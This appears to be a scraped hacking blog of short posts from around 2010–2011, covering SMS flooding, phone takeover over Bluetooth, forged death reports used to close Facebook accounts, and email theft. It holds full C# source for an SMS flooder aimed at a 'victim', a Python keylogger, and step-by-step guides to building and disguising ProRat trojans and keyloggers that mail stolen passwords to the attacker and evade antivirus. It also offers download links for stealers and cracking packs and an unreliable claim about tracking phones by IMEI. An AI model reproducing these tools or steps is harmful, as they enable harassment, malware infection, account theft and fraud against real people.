23:09

China Mobile Secret Codes

Cell phone tracking from AccuTracking


AccuTracking software turns your Motorola iDEN i58sr/i88s/i730 phones carried by Nextel into a GPS tracking device. The free online tracking service provided by AccuTracking.com lets you see locations/speed/headings of your mobile clients, sales forces or valuable assets.
Features:
- Web-based tracking & reporting. Know exactly where they are or have been from PC or PDA.
- Location, speed, heading data report.
- Links to aerial and topo maps.
- Geofence alerts via email or SMS.
- Sub-account (view-only account) support.
- Periodical or manual position reporting.
- Customizable sending intervals.
- External display ( i730 phone only).
- Free service.

The main website is http://www.accutracking.com/faqs.html

–Default user code : 1122, 3344, 1234, 5678
–Engineer mode : *#110*01#
–Factory mode : *#987#
–Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
–Restore factory settings : *#987*99#
–LCD contrast : *#369#
–Software version : *#800#
–Software version : *#900#
–Set default language : *#0000# Send
–Set English language : *#0044# Send
–Set English language (new firmware) : *#001# Send
–Default user code : 1122, 3344, 1234, 5678

23:06

mobile hacking

SMS Flooding


HiE FrIeNdS i HaVe SeEn MoRe NuMbEr Of PeOpLe aRe iNtErEsTeD iN SMS Flooding

HeRe i gOt ThE cOdE .... CoNvErT tHe AbOvE cOdE tO *.exe fIlE aNd ThEn We CaN StArT tHe SMS flooding

BeFoRe StArTiNg ThE pRoCeSs We NeEd To ReGiStEr In

Code:
http://www.smstau.com
aNd ThEn U hAvE tO aCtIvAtE bY sImPlY mOdIfYiNg We CaN bE aBlE tO uSe dIfFeReNt WeBsItEs AlSo .

Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;

namespace SMS_Flooder
{
    public partial class frmMain : Form
    {
        Random rnd = new Random();
        string chars = "abcdefghijklmnopqrstuvwxyz0123456789";
        string randomData = "";
        string message;

        public frmMain()
        {
            InitializeComponent();

            for (int i = 0; i < 100; i++)
            {
                cbCount.Items.Add(i + 1);
            }
            wb.Navigate("http://www.smstau.com");
        }

        private string GenerateString(int StringLength)
        {
            randomData = "";
            for (int i = 0; i < StringLength; i++)
            {
                randomData = randomData + chars[rnd.Next(0, 36)];
            }
            return randomData;
        }

        private string GetMessage()
        {
            message = "";
            if (rbRandom.Checked == true)
            {
                message = GenerateString(rnd.Next(10, 129)) + Environment.NewLine;
            }
            else if (rbCustom.Checked == true)
            {
                message = tbMsg.Text + Environment.NewLine;
            }
            return message;
        }

        private void rbCustom_CheckedChanged(object sender, EventArgs e)
        {
            tbMsg.Enabled = true;
        }

        private void rbRandom_CheckedChanged(object sender, EventArgs e)
        {
            tbMsg.Enabled = false;
        }

        private void btnFlood_Click(object sender, EventArgs e)
        {
            if (tbVictim.Text.Length < 10)
            {
                MessageBox.Show("Invalid Mobile Number", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
            else if (cbCount.Text == "")
            {
                MessageBox.Show("Select number of times to send sms", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
            else
            {
                string victim = "";
                for (int i = 0; i < Convert.ToInt32(cbCount.Text); i++)
                {
                    victim += tbVictim.Text + ",";
                }
                victim = victim.Remove(victim.Length - 1, 1);

                wb.Document.GetElementById("textfield_m").InnerText = victim;
                wb.Document.GetElementById("comment").InnerText = GetMessage();
                wb.Navigate(lblSend.Text);

                string spammed = "";
                spammed += "Mobile No.:" + tbVictim.Text + Environment.NewLine;
                spammed += "Messages Sent: " + cbCount.Text + Environment.NewLine;
                spammed += "Message: " + tbMsg.Text + Environment.NewLine;
                spammed += Environment.NewLine + "Enjoy Spamming :) :)" + Environment.NewLine;
                MessageBox.Show(spammed, "Flooded", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }

        private void tbVictim_TextChanged(object sender, EventArgs e)
        {
            if (tbVictim.Text.Contains("."))
            {
                tbVictim.Clear();
            }
            try
            {
                double check = Convert.ToDouble(tbVictim.Text);
            }
            catch (Exception)
            {
                tbVictim.Clear();
            }
        }

        private void wb_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
        {
            Text = "SMS Flooder";
            if (wb.Url.AbsolutePath == "/main.php")
            {
                gbFlooder.Enabled = true;
                lblLogged.Visible = true;
                lblTryAgain.Visible = false;
            }
            else
            {
                lblLogged.Visible = false;
                lblTryAgain.Visible = true;
            }
        }

        private void wb_Navigating(object sender, WebBrowserNavigatingEventArgs e)
        {
            Text = "SMS Flooder: Please Wait...";
        }

        private void btnLogin_Click(object sender, EventArgs e)
        {
            wb.Document.GetElementById("username").InnerText = tbLogin.Text;
            wb.Document.GetElementById("password").InnerText = tbPwd.Text;
            wb.Navigate(lblLogin.Text);
        }
    }
}

Source :
Code:
http://www.techole.com/2010/05/sms-flooder.html
Hack your friends mobile


So you want to do any of the following?

    * log into your friends mobile
    * read his messages
    * change his phone settings- read his messages
    * change profile
    * play his ringtone even if phone is on silent
    * play his songs(in his phone)
    * restart the phone
    * switch off the phone
    * restore factory settings
    * change ringing volume
    * call from his phone

Ok so how the hell to do this  Tongue  Ok for starters this is no hack.  It uses bluetooth's existing functionality to access the features being talked about.


Prerequisites:

    * The other phone must be bluetooth enabled(most are these days)
    * The other phone must have bluetooth on(Surprisingly a lot of people always have it on, in spite of the fact that you should never  have it on, it eats you battery. How many people, a BBC panaroma program some time back used this to find out that more than 60% of people have left bluetooth on
    * Unless the other person configured it that way, you do require permission to pair once. So you need to be paired with the other phone once to use this hack next time without anyone's knowing. (Thats why its hack your friends mobile, your friend might have paired you already

Usage:

    * On series 60, install directly
    * If you have a cellphone like series 40 (Nokia 6230) with bluetooth and Java 2 support make .jad file with jad generator (included on package).
    * When connecting devices use a code 0000
    * Before starting the application on smartphones do not forget to turn on bluetooth.

Code:
http://rapidshare.com/files/38882460/Super_Bluetooth_Hack.zip

23:01

Close FaceBook account(s)


Just Follow the steps:
Step 1 - Go to this url:
http://www.facebook.com/help/contact.php?show_form=deceased

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like: http://imageshack.us 
And it's done Wink... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.

It took me 1 hour to make this guide.
It took me 1 minute to make the thread.
I am using my spare time to share this with you and others.
It will take you 20 seconds to say thank you.

23:00

How to Hack E-Mail Account Password - Email Hacking Software


How to Hack Email Account Passwords Using ProRat?

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2. Open up the program. You should see the following:


. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".
[imghttp://3.bp.blogspot.com/_F7GuXCzPQdY/S_apc5p7WfI/AAAAAAAAEAo/Fi-7YtFp-SE/s1600/prorat2.png]http://[/img]

4. Next put in your IP address so the server could connect to you. If you donâۉ„¢t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exeâۉ„¢s looks suspicious so it would be smart to change it.




8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.


12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below Iâۉ„¢ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.


15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.



As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely wonâۉ„¢t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

Do you have questions, comments, or suggestions? Feel free to post a comment!
I hope i will help you all...enjoy...

22:58

Caller ID Spoofing


Caller ID Spoofing allows you to fake the caller id when calling another party. Upon calling a person, you will get to choose what number you want to appear as. Best of all, there is no way the party can find out what phone number the call originated from because their phone records will display the altered number.

Some of the companies that provide this feature are

1) SpoofCard (http://www.spoofcard.com/)
( International ).


2) Phone Gangster (http://www.phonegangster.com/freecall/agi)
(works in the USA and Canada) .


3) StealthCard (http://www.stealthrecordercard.com/freecall/agi)
(Works in US, Canada and Puerto Rico ) .


4) TeleSpoof (http://www.telespoof.com/freecall/agi)
(Works in US, Canada and Puerto Rico ) .

If you like it then make sure to comment it and rate it .

This is just for EDUCATIONAL PURPOSE ONLY.

Please don't misuse this information.

22:57

Sim Cloning SOftware


This Software Use for educational purpose only

1st Read pdf File Clone Help.rar


Download:-
 
Code:
http://www.ziddu.com/download/6758880/Si...n.rar.html


password:--
Code:
h4ck3r.in

22:56

Track Your Lost or Stolen Cell Phone


Here is an interesting fact to share.. Now a days each one of us carry Hi Fi Mobile devices and always fear that it may be stolen.

Each mobile carries a unique IMEI i.e International Mobile Identity
No which can be used to track your mobile anywhere in the world.
This is how it works!!!!!!

1. Dial *#06# from your mobile. (star Hash zero six Hash)
Press Enter (key which you press after entering phone number) You will see
15 digit number

2.Your mobile shows a unique 15 digit.

3...Note down this no anywhere but except your mobile as this is the number which will help trace your mobile in case of a theft.

4.Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net

5.No need to go to police.

6.Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet..

7.You will find where your hand set is being operated even in case your number is being changed. 

22:53

keylogger to hack[yahoo,gmail,facebook,orkut]


In this post is all about how to hack using keyloggers.
Now I will explain how to hack any acount (orkut, facebook, gmail, yahoo,..etc ) using fud keylogger.
1. Download azure fud keylogger here[http://www.ziddu.com/download/10725834/Azure-aio--www.hacksonly.com.rar.html].
 
2. The password is " hacksonly ".
 
3. Extract the files .
 
4. Run Azure aio.exe
 
5. Click on keylogger.
 
6. Give the email id to which the passwords must be sent.
 
7. Give the password of that email id .
 
8. give the output file name you want .
 
9. Select the time interval for which the logs must be sent.
 
10. select "anti's" and "add to start up".
 
11. click on build .
 
12. The keylogger srver will be created in the name that you gave .
 
13. Now this is the file that you have to give it to your friend or the person you want to hack.
 
14. You cannot send this file through email as this will be detected as a virus.
 
15. Upload it to anyof the file sharing sites like rapidshare.com or megaupload.com ,..etc
 
16. When the victim clicks on this file , the keylogger will be stored in his computer and will send all passwords to your
email id .
 
17. This keylogger can be detected as a virus or trojan by some of the antivirus .
 
18. This can be made FUD (Fully Undetectable) by using some FUD crypters and binders.
 
19. Now open "Azure aio.exe" from the downloaded file.
 
20. Use binder , crypter , to make it undetectable.
 
21. You can also use "file pumper" to avoid antivirus detection by increasing its size.
 
22. Use "icon changer" to change to change the icon of the server file

22:52

Hack Facebook/Myspace/Orkut Or Any Email


 Hack Facebook/Myspace/Orkut Or Any Email

    How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
    Fud Long Time

    Rapzo Logger v 1.5 ( Public Edition )By Rapid



Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

  • Firefox 3.5.0-3.6.X
  • DynDns
  • FileZilla
  • Pidgin
  • Imvu
  • No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers


Steler Logs :



Download LinkS :

Code:
http://www.mediafire.com/?belchwxdl6z2xl9

Code:
http://www.megaupload.com/?d=IFRRHPBX

Code:
http://rapidshare.com/files/418946168/Ra...tion__.rar

Code:
http://akenload.com/download/141/RapZo_L..._.rar.html

22:51

HAck using aradamax keylogger


Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.



This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.


Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

Download link:
Code:
http://rapidshare.com/files/47779604/Setup.rar
Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

22:51

KEYLOGGER IN PITHON


Source Code:

import WIN32API
import win32console
import win32gui

import pythoncom, pyHook

win32console.GetConsoleWindow win = ()
win32gui.ShowWindow (win, 0)

final OnKeyboardEvent (event):
if event.Ascii == 5:
_exit (1)

if event.Ascii! = 0 or 8:
f = open ( 'c: \ output.txt', 'r')
buffer = f.read ()
f.close ()
f = open ( 'c: \ output.txt', 'w')
keylogs = chr (event.Ascii)
if event.Ascii == 13:
keylogs = '/ n'
buffer + = keylogs
f.write (buffer)
f.close ()

hm = pyHook.HookManager ()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard ()
pythoncom.PumpMessages ()

22:49

Email Password Cracker (Bruteforce)




With this programm you can crack emai password ( if they are im bruteforce list )

if you need any help just reply

Scan:

File Info

Report date: 2011-03-14 23:51:53 (GMT 1)
File name: reiluke_mailbruteforcer-exe
File size: 1039024 bytes
MD5 Hash: 7fc516f265e337e14e91f23c461a8704
SHA1 Hash: 68b56bb5230db176ac18a20d18a19567dd063ae3
Detection rate: 0 on 9 (0%)
Status: CLEAN

Detections

Avast -
AVG -
ClamAV -
Comodo -
Emsisoft -
F-Prot -
Ikarus -
TrendMicro -
Zoner -

Scan report generated by
NoVirusThanks.org

Download

Code:

http://adf.ly/246619/http://www.multiupload.com/8851562RH4

22:48

Earn 50 dollars a month - Adfly bot.

Earn 50 dollars a month - Adflybot.
This bot has not been made by me, just sharing

With this bot you are avaible to get 50 dollars or more by doing nothing.
[hide]
You will need:

    * adfly account
    * The bot =)


Click this to register new adfly account.

Download the bot from here:

Code:
http://uploading.com/files/c3c5214c/Advance%2Badf%2BBot.rar/

Virustotal:
Code:
http://www.virustotal.com/file-scan/report.html?id=a71c084812ff745406518e3997dd120f91d3ad5ffa710aebdc06549c876ebc99-1299975601



With this bot you get real clicks, when the bot is online, your link is online and you get clicks from other people who are using the same program, its like click exchange, but its made for adfly. (it's automated)

There is usualy more than 2000 online.
[/hide]
What now?

Shrink your url, add it to that program, press start!
Well now you get clicks and you enjoy of free cash.


When you open the program you get stuck at "loading" thing or in updated? Well just try again, few times then it works again, their servers are sometimes just too busy that you need to try few times and them it works. I'm having this problem everytime i go into that program.

With this bot you are avaible to get 50 dollars or more by doing nothing.
[hide]
You will need:

    * adfly account
    * The bot =)


Click this to register new adfly account.

Download the bot from here:

Code:
http://uploading.com/files/c3c5214c/Advance%2Badf%2BBot.rar/

Virustotal:
Code:
http://www.virustotal.com/file-scan/report.html?id=a71c084812ff745406518e3997dd120f91d3ad5ffa710aebdc06549c876ebc99-1299975601



With this bot you get real clicks, when the bot is online, your link is online and you get clicks from other people who are using the same program, its like click exchange, but its made for adfly. (it's automated)

There is usualy more than 2000 online.
[/hide]
What now?

Shrink your url, add it to that program, press start!
Well now you get clicks and you enjoy of free cash.


When you open the program you get stuck at "loading" thing or in updated? Well just try again, few times then it works again, their servers are sometimes just too busy that you need to try few times and them it works. I'm having this problem everytime i go into that program.

22:48

Cryper + Hack

22:46

how to Access Any Website Or Forum Without Registering


All websites and forums will block unregistered users, but they won’t block Google Bot.
What we will do is to switch our User Agent to that of Google Bot and freely browse any
 website or forum without registering.




First grab the add-on for Firefox called ‘user agent’ here and install it. Now go to Tools > User Agent Switcher > Options and then again to Options.


Select User Agent from the left sidebar and click Add. Now in the description field type:

crawl-66-249-66-1.googlebot.com

and in user agent field type:

Googlebot/2.1 (+http://www.googlebot.com/bot.html)

as shown in the screenshot below.


Select Google Bot as your User Script by going to Tools > User Agent Switcher.



Now browse any website or forum without registering.

Hpoe you like my tut...thanks.


22:44

MOST WANTED TOOLS FOR HACKING, ALL IN ONE, A HUGE COLLECTION


THERE ARE MANY TOOLS SO NOT ABLE 
TO 
MAKE THE LIST!!!

Best Hacking Tools- 85 in 1
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

Best AIO Cracking Package
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

Brute Force Pack
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

CasiHacks Hacking Tools
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

Facebook Hacking Bundle
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

Reiluke Tools
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

Windows Wifi Collection
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

All Phishing Pages
DOWNLOAD LINK HERE

VIRUS SCAN LINK HERE

These are the most wanted tools for every hackers and noobs...

Edited by NEO
PASSWORD :  roncho123 

22:42

Facebook Friend Bomber 2.0.1


1. Mass Facebook Amber Alerts (New)
2. Mass Facebook Friend Requests
3. Mass Facebook Friend Messages
4. Mass Facebook Friend Pokes
5. Mass Facebook Wall Poster

6. 100% CAPTCHA Bypass*
7. Single & Unlimited Licenses

Download: Facebook Friend Bomber 2.0.1

AM NOT RESPONSIBLE IF ANYTHING GOES WRONG

22:41

RapidHack 4.5 Immortality Edition


RapidHack v4.5 Immortality Edition can h@ck / cr@ck / bypass waiting limit at Rapidshare.com and Rapidshare.de Just copy-paste the Rapidshare link and get unlimited downloads.

What's new in v4.5:
- Changed the way the Browser functions
- Changed the way Integrity checking works
- Added new integrity checking check points
- Added new client information in the Help section
- Repaired ripv5.php because Samair.ru patched the old version
- Included Flash "SWF" extension blocking, in case I go "Live" - They are registry entries
- Fixed invalid Homepage url in Websites console
- Fixed Runtime Error 5 in Refresh procedure
- Fixed Colon bug, so you now not need the Patch as with v4.2
- Client will Crash if lastline is selected in spoofer property, and I won't fix it.
- Made Custom CGI script modification [Host it yourself] in the CGI spoofer
- Removed AOL statistic options due to AOL terminating Hometown.aol.com
- Wrote how the Proxy Dead or Alive requests pings, so only lives for 4 requests.

DOWNLOAD:
Code:
http://rapidshare.com/files/260713035/R_H_v4.5__Immortality_Edition_.rar

MIRROR
Code:
http://www.megaupload.com/?d=5BDHGMU0

22:40

SHUTTING DOWN A REMOTE MACHINE ON LAN THROUGH IP



TODAY I WILL SHOW U HOW TO SHUTDOWN A REMOTE MACHINE ON LAN...IT WORKS BEST ON COLLEGES AND SCHOOLS.


------------------------------------------------------------------------------------------------
Step 1: Go to cmd

Step 2: Type shutdown -i .....this opens a dialouge box.

Step 3: Add the different ip of computers u want to shutdown there u can add up a notification and also turn                                           remote machine without a notification given to the machine.

Step 4: click ok...and u r done

u can also try out the command as shutdown -r -f -m \\"ip of the remote machine" -t xx.
where
-r : restarts the computer
-f :forcibly shuts down the pc
-t is the time in sec

22:39

Learn about Packet sniffing.


packet sniffer is a wiretap that eavesdrops network traffic.

Ethernet defines the way the data gets transmitted and sniffers catch this.
Ethernet actually uses sublayers to transmit data.
The physical takes care of the wires.
The logical retransmits data if neccesary.
The MAC is responsible for the formating of the data once it hits the wires.
Now you have probably heard the term MAC before but what exactly is it?
MAC stands for Media Acces Control. Your ethernet adapter has an ethernet (mac) address.
In windows you can check this by typing 'winipcfg' from a run box and choosing the appropriate network adapter (ipconfig /all for NT). This adress is a 48 bit number, displayed in Hex. The number is divided into two sections and should provide a unique adress for every network adapter.
The first halve identifies the manufacturer of the NIC and the second provides a serial number.
Now once an ethernet packet enters the wires it contains the following data:
Source MAC
Destination MAC
:HEX code:
IP packet
CRC

Explanation follows:

Simple.

The source and destination MAC should be clear.
The HEX code contains hexidecimal values so that the recieving computer knows what to do with it.

/*note: ethernet works with different protocols like netbeui and ipx/spx
The IP packet is the incapsulated "".
CRC, Webopedia says this:
Abbreviation of cyclic redundancy check, a common technique for detecting data transmission errors.

More.

TCP/IP decides, after negotiation, how to transmit data and then turns packets over to ethernet. Ethernet puts the right wrappings around it and sends it to the next destination. Once a packet hits the next destination, ethernet deciphers it and hands over control to the appropriate protocol. It might be forwarded, the protocol decides.
The Adres Resolution Protocol which is defined in: (rfc's are available from rfc-editor.org) might be worth checking out.
Typing arp -a from a command prompt gives you some information too.

So once a packet hits the ethernet wires it looks like this:
[ethernet[ip[tcp]]].
Packets vary in size. Sniffing on complete packets would not be a logic thing to do.
There are various reason you would like to sniff the network:
- Intrusion detection
- Network fault analysis
- Spying on conversation
- Stealing passwords
- Curiosity
Now normally when your box recieves a packet that should be forwarded that is the only thing done. A sniffer will capture data for analysis and send it through to the destination anyway. That makes it hard to detect sniffer attacks. A good placed sniffer can collect tons of valuable information. You could for example use a sniffer to find out what data you transmit to MS when you use update.
Now any good sniffer will decode the packets it filters for you and give you somewhat readable text. It will help you a great deal if you know your way around the various numbersystems as well as ascii.

To use a sniffer to attack somebody you will have to break in on the conversation somewhere.
That means either the victim or the victims ISP's computer.
Setting up an ICMP redirect could also do the trick.

Different protocols send passwords in clear text over the wires. These include:
Ftp
Telnet/rlogin
Http
POP.

Now to get you started you could get Windump which is the Windows porting off the popular Unix based Tcpdump.
Windump is available from http://windump.polito.it
It comes as source code distribution as well as binary.
Read the online manual for the parameters.
For a quick start 'windump -D (gives you available adapters)
windump -i 1 (starts windump with the first listed adapter)

Now after you capture packets you will have to use some sort of protocol analyzer to decode it.
Some sniffers include these where others do not.



Here come some sources where you can obtain packet-sniffers (msdos/windows):

ethereal:
Code:
http://www.ethereal.com/]http://www.ethereal.com/

etherpeek:
Code:
http://www.wildpackets.com/]http://www.wildpackets.com/

gobbler:
Code:
http://nmrc.org/files/msdos/gobbler.zip]http://nmrc.org/files/msdos/gobbler.zip

ethload:
Code:
http://ftp://ftp.simtel.net/pub/simtelnet/m...n/ethld200.izp]ftp://ftp.simtel.net/pub/simtelnet/m...n/ethld200.izp
(linux):

tcpdump:
Code:
http://www.tcpdump.org/]http://www.tcpdump.org/

LinSniff:
Code:
http://packetstorm.securify.com/]http://packetstorm.securify.com/